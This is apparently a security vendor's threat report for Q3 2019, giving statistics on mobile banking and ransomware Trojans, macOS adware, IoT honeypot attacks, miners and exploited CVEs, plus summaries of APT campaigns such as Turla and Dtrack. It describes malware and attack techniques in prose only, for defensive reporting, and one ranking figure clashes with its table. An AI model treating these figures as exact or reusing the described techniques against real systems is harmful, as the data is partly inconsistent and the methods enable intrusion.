Country* %** 1 Russia 0.30 2 South Africa 0.20 3 Kuwait 0.18 4 Tajikistan 0.13 5 Spain 0.12 6 Indonesia 0.12 7 China 0.11 8 Singapore 0.11 9 Armenia 0.10 10 Uzbekistan 0.10

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

In Q3 Russia moved up to first place (0.30%), which impacted the entire pattern of mobile bankers spread around the world. Users in Russia were most often targeted with Trojan-Banker.AndroidOS.Svpeng.ak (17.32% of all attempts to infect unique users with mobile financial malware). The same Trojan made it into the TOP 10 worldwide. It is a similar story with second and third places: Trojan-Banker.AndroidOS.Asacub.snt (11.86%) and Trojan-Banker.AndroidOS.Svpeng.q (9.20%).

South Africa fell to second place (0.20%), where for the second quarter in a row Trojan-Banker.AndroidOS.Agent.dx (89.80% of all mobile financial malware) was the most widespread threat.

Bronze went to Kuwait (0.21%), where, like in South Africa, Trojan-Banker.AndroidOS.Agent.dx (75%) was most often encountered.

Mobile ransomware Trojans

In Q3 2019, we detected 13,179 installation packages for mobile ransomware — 10,115 fewer than last quarter. We observed a similar drop in Q2, so since the start of the year the number of mobile ransomware Trojans has decreased almost threefold. The reason, as we see it, is the decline in activity of the group behind the Asacub Trojan.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of installation packages for mobile banking Trojans, Q3 2018 – Q3 2019 (download)

TOP 10 mobile ransomware Trojans

Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.aj 40.97 2 Trojan-Ransom.AndroidOS.Small.as 8.82 3 Trojan-Ransom.AndroidOS.Svpeng.ah 5.79 4 Trojan-Ransom.AndroidOS.Rkor.i 5.20 5 Trojan-Ransom.AndroidOS.Rkor.h 4.78 6 Trojan-Ransom.AndroidOS.Small.o 3.60 7 Trojan-Ransom.AndroidOS.Svpeng.ai 2.93 8 Trojan-Ransom.AndroidOS.Small.ce 2.93 9 Trojan-Ransom.AndroidOS.Fusob.h 2.72 10 Trojan-Ransom.AndroidOS.Small.cj 2.66

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans.

In Q3 2019, the leading positions among ransomware Trojans were retained by members of the Trojan-Ransom.AndroidOS.Svpeng family. Top spot, as in the previous quarter, was claimed by Svpeng.aj (40.97%), with Svpeng.ah (5.79%) in third.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile ransomware Trojans, Q3 2019 (download)

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %** 1 US 1.12 2 Iran 0.25 3 Kazakhstan 0.25 4 Oman 0.09 5 Qatar 0.08 6 Saudi Arabia 0.06 7 Mexico 0.05 8 Pakistan 0.05 9 Kuwait 0.04 10 Indonesia 0.04

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

The leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.12%), Iran (0.25%), and Kazakhstan (0.25%)

Attacks on Apple macOS

Q3 saw a lull in the emergence of new threats. An exception was the distribution of a modified version of the Stockfolio investment app, which contained an encrypted reverse shell backdoor.

TOP 20 threats for macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 22.71 2 AdWare.OSX.Pirrit.j 14.43 3 AdWare.OSX.Pirrit.s 11.73 4 AdWare.OSX.Pirrit.p 10.43 5 AdWare.OSX.Pirrit.o 9.71 6 AdWare.OSX.Bnodlero.t 8.40 7 AdWare.OSX.Spc.a 7.32 8 AdWare.OSX.Cimpli.d 6.92 9 AdWare.OSX.MacSearch.a 4.88 10 Adware.OSX.Agent.d 4.71 11 AdWare.OSX.Ketin.c 4.63 12 AdWare.OSX.Ketin.b 4.10 13 Downloader.OSX.InstallCore.ab 4.01 14 AdWare.OSX.Cimpli.e 3.86 15 AdWare.OSX.Bnodlero.q 3.78 16 AdWare.OSX.Cimpli.f 3.76 17 AdWare.OSX.Bnodlero.x 3.49 18 AdWare.OSX.Mcp.a 3.26 19 AdWare.OSX.MacSearch.d 3.18 20 AdWare.OSX.Amc.a 3.15

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked.

Like last quarter, the adware Trojan Shlayer was the top threat for macOS. This malware in turn downloaded adware programs of the Pirrit family, as a result of which its members took the second to fifth positions in our ranking.

Threat geography Country* %** 1 France 6.95 2 India 6.24 3 Spain 5.61 4 Italy 5.29 5 US 4.84 6 Russia 4.79 7 Brazil 4.75 8 Mexico 4.68 9 Canada 4.46 10 Australia 4.27

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

The geographical distribution of attacked users underwent some minor changes: India took silver with 6.24% of attacked users, while Spain came in third with 5.61%. France (6.95%) hung on to first position.

IoT attacks IoT threat statistics

In Q3, the trend continued toward a decrease in the number of IP addresses of devices used to carry out attacks on Kaspersky Telnet honeypots. If in Q2 Telnet’s share was still significantly higher than that of SSH, in Q3 the figures were almost equal.

SSH 48.17% Telnet 51.83%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2019

As for the number of sessions involving Kaspersky traps, we noted that in Q3 Telnet-based control was also deployed more often.

SSH 40.81% Telnet 59.19%

Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2019

Telnet-based attacks

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2019 (download)

TOP 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky traps

Country %* 1 China 13.78 2 Egypt 10.89 3 Brazil 8.56 4 Taiwan 8.33 5 US 4.71 6 Russia 4.35 7 Turkey 3.47 8 Vietnam 3.44 9 Greece 3.43 10 India 3.41

Last quarter’s leaders Egypt (10.89%), China (13.78%), and Brazil (8.56%) again made up the TOP 3, the only difference being that this time China took the first place.

Telnet-based attacks most often resulted in the download of a member of the notorious Mirai family.

TOP 10 malware downloaded to infected IoT devices via successful telnet-based attacks

Verdict %* 1 Backdoor.Linux.Mirai.b 38.08 2 Trojan-Downloader.Linux.NyaDrop.b 27.46 3 Backdoor.Linux.Mirai.ba 16.52 4 Backdoor.Linux.Gafgyt.bj 2.76 5 Backdoor.Linux.Mirai.au 2.21 6 Backdoor.Linux.Mirai.c 2.02 7 Backdoor.Linux.Mirai.h 1.81 8 Backdoor.Linux.Mirai.ad 1.66 9 Backdoor.Linux.Gafgyt.az 0.86 10 Backdoor.Linux.Mirai.a 0.80

* Share of malware type in the total amount of malware downloaded to IoT devices following a successful Telnet-based attack.

SSH-based attacks

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2019 (download)

TOP 10 countries by location of devices from which attacks were made on Kaspersky SSH traps

Country %* 1 Egypt 17.06 2 Vietnam 16.98 3 China 13.81 4 Brazil 7.37 5 Russia 6.71 6 Thailand 4.53 7 US 4.13 8 Azerbaijan 3.99 9 India 2.55 10 France 1.53

In Q3 2019, the largest number of attacks on Kaspersky traps using the SSH protocol came from Egypt (17.06%). Vietnam (16.98%) and China (13.81%) took second and third places, respectively.

Financial threats Financial threat statistics

In Q3 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 197,559 users.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by financial malware, Q3 2019 (download)

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of banking malware attacks, Q3 2019 (download)

TOP 10 countries by share of attacked users

Country* %** 1 Belarus 2.9 2 Uzbekistan 2.1 3 South Korea 1.9 4 Venezuela 1.8 5 Tajikistan 1.4 6 Afghanistan 1.3 7 China 1.2 8 Syria 1.2 9 Yemen 1.2 10 Sudan 1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country.

TOP 10 banking malware families

Name Verdicts %* 1 Zbot Trojan.Win32.Zbot 26.7 2 Emotet Backdoor.Win32.Emotet 23.9 3 RTM Trojan-Banker.Win32.RTM 19.3 4 Nimnul Virus.Win32.Nimnul 6.6 5 Trickster Trojan.Win32.Trickster 5.8 6 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 5.4 7 Nymaim Trojan.Win32.Nymaim 3.6 8 SpyEye Trojan-Spy.Win32.SpyEye 3.4 9 Danabot Trojan-Banker.Win32.Danabot 3.3 10 Neurevt Trojan.Win32.Neurevt 1.8

** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

The TOP 3 in Q3 2019 had the same faces as last quarter, only in a different order: the RTM family (19.3%) dropped from first to third, shedding almost 13 p.p., allowing the other two — Zbot (26.7%) and Emotet (23.9%) — to climb up. Last quarter we noted a decline in the activity of Emotet servers, but in Q3 it came back on track, with Emotet’s share growing by more than 15 p.p.

Fourth and fifth places did not change at all — still occupied by Nimnul (6.6%) and Trickster (5.8%). Their scores rose insignificantly, less than 1 p.p. Of the new entries in our TOP 10, worth noting is the banker CliptoShuffler (5.4%), which stormed straight into sixth place.

Ransomware programs Quarterly highlights

The number of ransomware attacks against government agencies, as well as organizations in the healthcare, education, and energy sectors, continues to rise. This trend we noted back in the previous quarter.

A new type of attack, one on network attached storages (NAS), is gaining ground. The infection scheme involves attackers scanning IP address ranges in search of NAS devices accessible via the Internet. Generally, only the web interface is accessible from the outside, protected by an authentication page; however, a number of devices have vulnerabilities in the firmware. This enables cybercriminals, by means of an exploit, to install on the device a Trojan that encrypts all data on NAS-connected media. This is a particularly dangerous attack, since in many cases the NAS is used to store backups, and such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock.

Wipers have also become a more frequent attack tool. Like ransomware, such programs rename files and make ransom demands. But these Trojans irreversibly ruin the file contents (replacing them with zeros or random bytes), so even if the victim pays up, the original files are lost.

The FBI published decryption keys for GandCrab (verdict Trojan-Ransom.Win32.GandCrypt) versions 4 and 5. The decryption was added to the latest RakhniDecryptor build.

Number of new modifications

In Q3 2019, we identified three new families of ransomware Trojans and discovered 13,138 new modifications of this malware.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of new ransomware modifications, Q3 2018 – Q3 2019 (download)

Number of users attacked by ransomware Trojans

In Q3 2019, Kaspersky products defeated ransomware attacks against 229,643 unique KSN users. This is slightly fewer than the previous quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by ransomware Trojans, Q3 2019 (download)

July saw the largest number of attacked users — 100,380, almost 20,000 more than in June. After that, however, this indicator fell sharply and did not stray far from the figure of 90,000 attacked users.

Attack geography

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geographical spread of countries by share of users attacked by ransomware Trojans, Q3 2019 (download)

TOP 10 countries attacked by ransomware Trojans

Country* % of users attacked by cryptors** 1 Bangladesh 6.39 2 Mozambique 2.96 3 Uzbekistan 2.26 4 Nepal 1.71 5 Ethiopia 1.29 6 Ghana 1.19 7 Afghanistan 1.12 8 Egypt 0.83 9 Palestine 0.80 10 Vietnam 0.79

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

TOP 10 most common families of ransomware Trojans Name Verdicts % of attacked users* 1 WannaCry Trojan-Ransom.Win32.Wanna 20.96 2 (generic verdict) Trojan-Ransom.Win32.Phny 20.01 3 GandCrab Trojan-Ransom.Win32.GandCrypt 8.58 4 (generic verdict) Trojan-Ransom.Win32.Gen 8.36 5 (generic verdict) Trojan-Ransom.Win32.Encoder 6.56 6 (generic verdict) Trojan-Ransom.Win32.Crypren 5.08 7 Stop Trojan-Ransom.Win32.Stop 4.63 8 Rakhni Trojan-Ransom.Win32.Rakhni 3.97 9 (generic verdict) Trojan-Ransom.Win32.Crypmod 2.77 10 PolyRansom/VirLock Virus.Win32.PolyRansom
Trojan-Ransom.Win32. PolyRansom 2.50

* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.

Miners Number of new modifications

In Q3 2019, Kaspersky solutions detected 11 753 new modifications of miners.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of new miner modifications, Q3 2019 (download)

Number of users attacked by miners

In Q3, we detected attacks using miners on the computers of 639,496 unique users of Kaspersky products worldwide.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by miners, Q3 2019 (download)

The number of attacked users continued to decline in Q3, down to 282,334 in August. In September, this indicator began to grow — up to 297,394 — within touching distance of July’s figure.

Attack geography

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geographical spread of countries by share of users attacked by miners, Q3 2019 (download)

TOP 10 countries by share of users attacked by miners

Country* % of users attacked by miners** 1 Afghanistan 9.42 2 Ethiopia 7.29 3 Uzbekistan 4.99 4 Sri Lanka 4.62 5 Tanzania 4.35 6 Vietnam 3.72 7 Kazakhstan 3.66 8 Mozambique 3.44 9 Rwanda 2.55 10 Bolivia 2.43

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyber attacks

As before, in the statistics on the distribution of exploits used by cybercriminals, a huge share belongs to vulnerabilities in the Microsoft Office suite (73%). Most common of all, as in the previous quarter, were stack overflow errors (CVE-2017-11882, CVE-2018-0802) in the Equation Editor application, which was previously part of Microsoft Office. Other Microsoft Office vulnerabilities widely exploited this quarter were again CVE-2017-8570, CVE-2017-8759, and CVE-2017-0199.

Modern browsers are complex software products, which means that new vulnerabilities are constantly being discovered and used in attacks (13%). The most common target for cybercriminals is Microsoft Internet Explorer, vulnerabilities in which are often exploited in the wild. This quarter saw the discovery of the actively exploited zero-day vulnerability CVE-2019-1367, which causes memory corruption and allows remote code execution on the target system. The fact that Microsoft released an unscheduled patch for it points to how serious the situation was. Nor was Google Chrome problem-free this quarter, having received updates to fix a number of critical vulnerabilities (CVE-2019-13685, CVE-2019-13686, CVE-2019-13687, CVE-2019-13688), some of which allow intruders to circumvent all levels of browser protection and execute code in the system, bypassing the sandbox.

The majority of vulnerabilities aimed at privilege escalation inside the system stem from individual operating system services and popular apps. Privilege escalation vulnerabilities play a special role, as they are often utilized in malicious software to obtain persistence in the target system. Of note this quarter are the vulnerabilities CVE-2019-14743 and CVE-2019-15315, which allow compromising systems with the popular Steam client installed. A flaw in the Microsoft Windows Text Services Framework also warrants a mention. A Google researcher published a tool to demonstrate the problem (CtfTool), which allows processes to be run with system privileges, as well as changes to be made to the memory of other processes and arbitrary code to be executed in them.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of exploits used in attacks by type of application attacked, Q3 2019 (download)

Network attacks are still widespread. This quarter, as in previous ones, we registered numerous attempts to exploit vulnerabilities in the SMB protocol. This indicates that unprotected and not-updated systems are still at high risk of infection in attacks that deploy EternalBlue, EternalRomance, and other exploits. That said, a large share of malicious network traffic is made up of requests aimed at bruteforcing passwords in popular network services and servers, such as Remote Desktop Protocol and Microsoft SQL Server. RDP faced other problems too related to the detection of several vulnerabilities in this network protocol united under the common name DejaBlue (CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, CVE-2019-1223, CVE-2019-1224, CVE-2019-1225, CVE-2019-1226). Unlike the previously discovered CVE-2019-0708, these vulnerabilities affect not only old versions of operating systems, but new ones as well, such as Windows 10. As in the case of CVE-2019-0708, some DejaBlue vulnerabilities do not require authorization in the attacked system and allow to carry out malicious activity invisible to the user. Therefore, it is vital to promptly install the latest updates for both the operating system and antivirus solutions to reduce the risk of infection.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: TOP 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2019, Kaspersky solutions blocked 989,432,403 attacks launched from online resources located in 203 countries across the globe. 560,025,316 unique URLs triggered Web Anti-Virus components.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of web-based attack sources by country, Q3 2019 (download)

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users** 1 Tunisia 23.26 2 Algeria 19.75 3 Albania 18.77 4 Réunion 16.46 5 Bangladesh 16.46 6 Venezuela 16.21 7 North Macedonia 15.33 8 France 15.09 9 Qatar 14.97 10 Martinique 14.84 11 Greece 14.59 12 Serbia 14.36 13 Syria 13.99 14 Bulgaria 13.88 15 Philippines 13.71 16 UAE 13.64 17 Djibouti 13.47 18 Morocco 13.35 19 Belarus 13.34 20 Saudi Arabia 13.30

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average, 10.97% of Internet user computers worldwide experienced at least one Malware-class attack.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of malicious web-based attacks, Q3 2019 (download)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2019, our File Anti-Virus detected 230,051,054 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Afghanistan 53.45 2 Tajikistan 48.43 3 Yemen 48.39 4 Uzbekistan 48.38 5 Turkmenistan 45.95 6 Myanmar 45.27 7 Ethiopia 44.18 8 Laos 43.24 9 Bangladesh 42.96 10 Mozambique 41.58 11 Syria 41.15 12 Vietnam 41.11 13 Iraq 41.09 14 Sudan 40.18 15 Kyrgyzstan 40.06 16 China 39.94 17 Rwanda 39.49 18 Venezuela 39.18 19 Malawi 38.81 20 Nepal 38.38

These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones and external hard drives.

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of local infection attempts, Q3 2019 (download)

Overall, 21.1% of user computers globally faced at least one Malware-class local threat during Q3.

The figure for Russia was 24.24%.

IT threat evolution Q3 2019

29 Listopad, 2019 - 11:00

Targeted attacks and malware campaigns Mobile espionage targeting the Middle East

At the end of June we reported the details of a highly targeted campaign that we dubbed ‘Operation ViceLeaker’ involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our Threat Intelligence Portal. We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate ‘Conversations’ messenger that included the malicious code. You can read more about Operation ViceLeaker here.

APT33 beefs up its toolset

In July, we published an update on the 2016-17 activities of NewsBeef (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with spear-phishing emails, links sent over social media and standalone private messaging applications, and watering-hole attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our private intelligence reports receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.

New FinSpy iOS and Android implants found in the wild

We recently reported on the latest versions of FinSpy for Android and iOS. Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn’t provide infection exploits for its customers and so can only be installed on jailbroken devices – suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.

Turla revamps its toolset

Turla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely ‘fileless’: the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer’s registry for the malware to access when ready. The two KopiLuwak analogues – the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more here.

CloudAtlas uses new infection chain

Cloud Atlas (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn’t changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor’s Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates – whitelisted per victim – hosted on remote servers. Previously, Cloud Atlas dropped its ‘validator’ implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.

Dtrack banking malware discovered

In summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers – we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack memory dumps. Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the DarkSeoul campaign, dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group’s arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack here.

Other security news Sodin ransomware attacks MSP

In April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan exploited the CVE-2019-2725 vulnerability to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered – CVE-2019-2729. Sodin also carried out attacks on MSPs. In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, the attackers penetrated MSP infrastructure using an RDP connection, elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn’t require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.

